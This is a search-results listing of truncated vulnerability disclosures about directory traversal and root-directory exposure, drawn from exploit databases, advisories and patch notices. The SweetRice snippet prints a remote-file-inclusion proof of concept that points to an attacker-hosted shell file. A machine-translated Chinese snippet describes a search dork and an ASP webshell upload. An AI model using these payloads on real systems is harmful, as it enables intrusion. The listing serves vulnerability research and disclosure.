669 matches found
httpdx 1.5 - 'MKD' Directory Traversal
source: https://www.securityfocus.com/bid/38242/info The 'httpdx' program is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue allows an authenticated user to create directories outside the FTP root directory, which m...
Samba Vulnerability Open to Root Directory
A vulnerability in the creation of symbolic links symlinks in the free Samba file and printer server can be exploited to attain access to files outside of predefined paths and to the root directory. Read the full article. The H Security...
Bo Yin technology management system 1 7, then storm latest oday-vulnerability warning-the black bar safety net
The original vulnerability: GG search inurl:cpzs. asp? ProClass= The root directory under /manage/Product/addnews. asp Content just to write the thumbnail upload there the asp of the horse After the submission of the to the EDIT to find that the asp name Structure http:// 网址 /UpLoadPic/ProPic/ 上传...
SweetRice 0.5.3 - Remote File Inclusion
SweetRice 0.5.3 - Remote File Inclusion Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg SweetRice PoC : http://server/plugin/subscriber/inc/post.php?rootdir=http://attacker/shell.txt??? 90r0nt4l0 und3r9r0nd c0mmun1ty Gorontalo / 2009...
XM Easy Personal FTP Server Remote DoS Vulnerability
Date of Discovery: 24-Nov-2009 Credits:leinakesiatgmail.com Vendor: Dxmsoft Affected: XM Easy Personal FTP Server 5.8.0 Earlier versions may also be affected Overview: XM Easy Personal FTP Server failed to handle more than 2000 files or folders in the root directory. Details: if you could log on...
XM Easy Personal FTP Server 5.8.0 - Remote Denial of Service
Date of Discovery: 24-Nov-2009 Credits:leinakesiatgmail.com Vendor: Dxmsoft Affected: XM Easy Personal FTP Server 5.8.0 Earlier versions may also be affected Overview: XM Easy Personal FTP Server failed to handle more than 2000 files or folders in the root directory. Details: if you could log on...
SuSE 10 Security Update : Samba (ZYPP Patch Number 6518)
samba's makeconnectionsnum handles certain input incorrectly, which may lead to disclosure of the root directory. CVE-2009-2813 has been assigned to this issue. Additionally an information disclosure vulnerability in mount.cifs has been fixed CVE-2009-2948 as well as a DoS condition. CVE-2009-290...
SuSE 11 Security Update : Samba (SAT Patch Number 1352)
samba's makeconnectionsnum handles certain input incorrectly, which may lead to disclosure of the root directory. CVE-2009-2813 has been assigned to this issue. Additionally an information disclosure vulnerability in mount.cifs has been fixed CVE-2009-2948 as well as a DoS condition. CVE-2009-290...
EXcms Root directory disclosure vulnerability
---------------------------------------------------------------------- PT-2009-22 Positive Technologies Security Advisory EXcms Root directory disclosure vulnerability ---------------------------------------------------------------------- --- Affected Software EXcms Versions prior to 2.02 Product...
A.CMS Multiple Vulnerabilities
---------------------------------------------------------------------- PT-2009-20 Positive Technologies Security Advisory A.CMS Multiple Vulnerabilities ---------------------------------------------------------------------- --- Affected Software A.CMS Versions prior to 1.23 Product Link:...
iNTERNET.cms Cross-Site Scripting vulnerability
---------------------------------------------------------------------- PT-2009-22 Positive Technologies Security Advisory EXcms Root directory disclosure vulnerability ---------------------------------------------------------------------- --- Affected Software EXcms Versions prior to 2.02 Product...
ShopEx 4.7.2 0day-vulnerability warning-the black bar safety net
Author: unknown I am nameless, and this time write a shopex4. 7. 2 vulnerability Has been notified of the official, today it is issued to, First syssite/shopadmin/orderservice. php background this document does not verify the identity of the user, It is important$vid parameter is not filtered...
CVE-2008-5967
admin/index.php in PHP iCalendar 2.3.4, 2.24, and earlier does not require administrative authentication for an addupdate action, which allows remote attackers to upload a calendar aka .ics file with arbitrary content to the calendars/ directory outside the web root...
PT-2009-22: EXcms Root directory disclosure vulnerability
EXcms is a content management system CMS software, usually implemented as a Web application, for creating and managing HTML content. It is used to manage and control a large, dynamic collection of Web material HTML documents and their associated images. Vulnerability Description Positive...
Line of code are not written, penetrating the Jinshan Islands-vulnerability warning-the black bar safety net
Kingsoft files security the island will put the file to protect COPY to My Document\Kingsoft security Island\documents When you want to access the directory of the file, it will prompt reject Penetration method,直接 运行 cmd.exeI'm the My Document directory in the D disk root directory d: d:\cd MYDOC...
LANDesk Management Suite 8.80.1.1 - PXE TFTP Service Directory Traversal
LANDesk Management Suite 8.80.1.1 - PXE TFTP Service Directory Traversal source: https://www.securityfocus.com/bid/28577/info LANDesk Management Suite is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. Exploiting this issue allows a...
2X ThinClientServer 5.0 sp1-r3497 TFTP Service - Directory Traversal
2X ThinClientServer 5.0 sp1-r3497 TFTP Service - Directory Traversal source: https://www.securityfocus.com/bid/28504/info 2X ThinClientServer is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. Exploiting this issue allows an attacke...
File Transfer 1.2 - Request File Directory Traversal
File Transfer 1.2 - Request File Directory Traversal source: https://www.securityfocus.com/bid/28453/info File Transfer is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. Exploiting this issue allows an attacker to access arbitrary...
Land Down Under 802 and below version Path Disclosure Vulnerability
Land Down Under 802 and below version Path Disclosure Vulnerability ------------------------------------------------------------------------------------------------------------------------------- Aria-Security.net Advisory Discovered by:R@1D3N amin emami date:21/04/2006 original...
Vulnerabilities in lifetype
k k kkkk kk kkkk k k kkkkkk kkkkkk kkkk k k k k k k k k k k k k k k kk k k k k kk k k k k kk kkkkk k kkkkk kk kk kkkkkk k k k k k k kk k k k k k k k kk k k k k k k k k k k k k kkkk kk kkkk k k kk k k kkkk k kk k k k =- Vulnerabilities in Lifetype Author : Rusydi Hasan M a.k.a : cR45H3R Date :...